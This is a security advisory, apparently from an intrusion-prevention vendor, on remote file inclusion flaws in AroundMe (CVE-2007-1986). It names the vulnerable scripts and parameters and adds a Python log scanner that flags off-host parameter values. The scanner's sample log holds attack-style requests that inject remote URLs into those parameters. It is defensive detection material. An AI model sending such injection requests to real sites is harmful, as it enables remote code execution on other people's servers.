Intrusion Prevention

AroundMe.Multiple.Remote.File.Inclusion

Description

This indicates multiple file inclusion vulnerabilities in AroundMe. They are due to input validation errors in the "components/core/inc/core_profile.header.php", "components/core/template/barnraiser_01/maint_contact_view.tpl.php", and "components/core/template/barnraiser_01/default.tpl.php" scripts when processing the "language_path_core", "template_path_core" and "template_path" parameters. The vulnerabilities allow remote attackers to include malicious scripts and execute arbitrary commands with the privileges of the web server.
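Added example, not part of the original advisory or of AroundMe's code: a Python check that scans web server access logs for requests to the three scripts named above in which one of the three listed parameters carries an off-host location. It assumes the Apache/nginx "combined" log format; the function name, the sample log lines and the hosts in them are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script paths and parameter names are the ones listed in the description.
SCRIPTS = (
    "components/core/inc/core_profile.header.php",
    "components/core/template/barnraiser_01/maint_contact_view.tpl.php",
    "components/core/template/barnraiser_01/default.tpl.php",
)
PARAMS = {"language_path_core", "template_path_core", "template_path"}

# Assumption: "combined" log format (client first, quoted request line, then status).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A value starting with a URL scheme (two or more characters, so "C:" is not
# matched) or with "//" refers to a location outside the local template tree.
REMOTE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//)', re.I)

# Constructed sample input (documentation IP ranges, .invalid hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2007:09:12:01 +0000] "GET /aroundme/components/core/inc/core_profile.header.php?language_path_core=http://files.example.invalid/a.txt HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [10/Apr/2007:09:12:03 +0000] "GET /aroundme/components/core/template/barnraiser_01/default.tpl.php?template_path=ftp%3A%2F%2Ffiles.example.invalid%2Fb HTTP/1.1" 404 210 "-" "-"',
    '192.0.2.15 - - [10/Apr/2007:09:13:40 +0000] "GET /aroundme/components/core/template/barnraiser_01/default.tpl.php?template_path=template/barnraiser_01/ HTTP/1.1" 200 4096 "-" "-"',
    '192.0.2.15 - - [10/Apr/2007:09:14:02 +0000] "GET /aroundme/index.php?page=http://www.example.invalid/ HTTP/1.1" 200 1024 "-" "-"',
]


def suspicious_requests(lines):
    """Return (client, script, parameter, value, status) for each flagged request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parsable request line
        client, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path).lower()
        script = next((s for s in SCRIPTS if path.endswith("/" + s)), None)
        if script is None:
            continue  # request is for a script the advisory does not name
        # parse_qsl percent-decodes names and values once.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in PARAMS and REMOTE.match(value):
                hits.append((client, script, name, value, int(status)))
    return hits
```

The status code in each result helps triage: a 200 means the targeted script exists and was served, while a 404 means it was only probed. Parameters sent in a POST body do not appear in access logs and need request-body inspection instead.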

Affected Products

AROUNDMe version 0.7.7 and prior.

Impact

System compromise.

Recommended Actions

Currently we are not aware of any officially supplied fix for this issue.
Vendor's web site: http://www.barnraiser.org/

CVE References

CVE-2007-1986